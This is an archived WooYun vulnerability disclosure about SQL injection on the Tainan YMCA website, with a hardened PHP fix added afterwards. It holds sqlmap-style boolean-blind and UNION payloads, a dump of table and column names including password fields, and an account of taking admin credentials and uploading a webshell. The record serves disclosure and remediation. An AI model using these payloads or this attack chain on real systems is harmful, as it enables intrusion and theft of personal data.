WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-01-19: Details sent to the vendor, awaiting the vendor's response
2016-01-21: Vendor confirmed; details disclosed to the vendor only
2016-01-31: Details disclosed to core white hats and relevant domain experts
2016-02-10: Details disclosed to regular white hats
2016-02-20: Details disclosed to intern white hats
2016-03-06: Details disclosed to the public
Tainan YMCA website: SQL injection leading to getshell (large-scale user data leak)
Tainan YMCA: **.**.**.**
Injection point: **.**.**.**/ymca/news_detail.php?id=152
Site admin backend: **.**.**.**/nursery/admin/login.php
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=152 AND 2980=2980

Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-5710 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176626771,0x72515149534a4e644842,0x716f757a71),NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
Current user's database
current database: 'ymca_db'
Large numbers of tables and columns
Database: ymca_db [77 tables]
ad_banner, admin_account, at_heart_msg, carry_result_class, carry_result_event, carry_result_record, carry_result_record_pic, city_name,
cjshs_event_photo, cjshs_event_photo_pic, cjshs_news, complain_faq, course_class, course_data, course_faq, course_learn_rpt,
course_quest_answer, epaper_article_subject, epaper_main, epaper_section_content, epaper_send_log, epaper_subscriber, event_course, event_course_category,
event_course_class, event_course_reg_mail, event_course_section, event_course_series, event_news, event_news_class, event_photo, event_photo_pic,
event_reg, exam_accomp, exam_answer, exam_question, exam_sel_item, exam_subject, faq_class, faq_rpt,
forum_class, forum_post, forum_topic, home_ad_links, institute_mail, links_rpt, marquee_news, msg_answer,
msg_question, news_rpt, news_rpt_class, nurse_data, nurse_license, nurse_login_log, other_edu_score, park_event_photo,
park_event_photo_pic, park_news, quest_answer, quest_class, quest_question, quest_question_class, quest_replier, quest_sel_item,
quest_subject, site_content_article, site_content_section, site_content_upfile, site_map_item, teacher_data, teacher_login_log, vote_question,
vote_sel_item, xie_event_photo, xie_event_photo_pic, xie_news, zip_code
Database: ymca_db
Table: teacher_data [30 columns]
+-------------------------+---------------------+
| Column                  | Type                |
+-------------------------+---------------------+
| acc_status              | char(1)             |
| address                 | tinytext            |
| birthday                | date                |
| dep                     | varchar(50)         |
| e_mail                  | tinytext            |
| end_date                | date                |
| health_insurance_areano | tinyint(3) unsigned |
| hospital_name           | tinytext            |
| hospital_no             | varchar(20)         |
| hp_type                 | tinyint(3) unsigned |
| id                      | int(10) unsigned    |
| job                     | varchar(50)         |
| keyin_date              | datetime            |
| keyin_man               | varchar(20)         |
| license_no              | varchar(20)         |
| login_date              | datetime            |
| mobile                  | varchar(50)         |
| nickname                | varchar(50)         |
| p_id                    | char(10)            |
| pass_word               | varchar(13)         |
| post_count              | int(10) unsigned    |
| realname                | varchar(50)         |
| remark                  | text                |
| sex                     | enum('m','f')       |
| start_date              | date                |
| tel_no                  | varchar(50)         |
| upd_date                | datetime            |
| upd_man                 | varchar(20)         |
| uppic_0                 | varchar(50)         |
| username                | varchar(20)         |
+-------------------------+---------------------+
Database: ymca_db
Table: admin_account [35 entries]
Columns: username, pass_word
Dumped the table to obtain the backend administrator account and password, logged into the backend, and uploaded a webshell (getshell).
Fix: filter the input.
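As an added example (not code from the report or from the site itself), the hardened form of the lookup behind news_detail.php?id=: the id is validated as a positive integer and then bound in a prepared statement, so neither of the payloads shown above can reach the SQL parser. The table name event_news comes from the dumped table list; the column names title and content, the DB account and its password are assumed placeholders, and the code stays within what PHP 5.3 / PDO supports.

```php
<?php
// Added example, not the site's own code. Hardened handler for
// news_detail.php?id=..., written against PHP 5.3 / MySQL as reported
// on the page. Table `event_news` is from the dumped table list; the
// column names `title` and `content` are assumed.

// Vulnerable pattern implied by the report (for contrast, do not use):
//   $sql = "SELECT * FROM event_news WHERE id=" . $_GET['id'];

function connect_db()
{
    // Credentials are placeholders. Least privilege: grant the web account
    // only the tables the public site needs, so a bug like this one cannot
    // read admin_account or teacher_data.
    $dsn = 'mysql:host=localhost;dbname=ymca_db;charset=utf8';
    $pdo = new PDO($dsn, 'ymca_web', 'PLACEHOLDER_PASSWORD', array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ));
    return $pdo;
}

function fetch_news_by_id(PDO $pdo, $raw_id)
{
    // 1. Validate: id must be a positive integer. "152 AND 2980=2980" and
    //    "-5710 UNION ALL SELECT ..." both fail here and never reach SQL.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null;
    }

    // 2. Parameterize: the value is bound as an integer, never spliced into
    //    the query text, so it cannot alter the query's structure.
    $stmt = $pdo->prepare('SELECT id, title, content FROM event_news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo  = connect_db();
$news = fetch_news_by_id($pdo, isset($_GET['id']) ? $_GET['id'] : '');
if ($news === null) {
    header('HTTP/1.1 404 Not Found');
    exit('Not found');
}
// 3. Encode on output as well; the injection fix does not cover XSS.
echo htmlspecialchars($news['title'], ENT_QUOTES, 'UTF-8');
```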
Severity: High
Vulnerability Rank: 17
Confirmed: 2016-01-21 23:33
Thanks for the report
None yet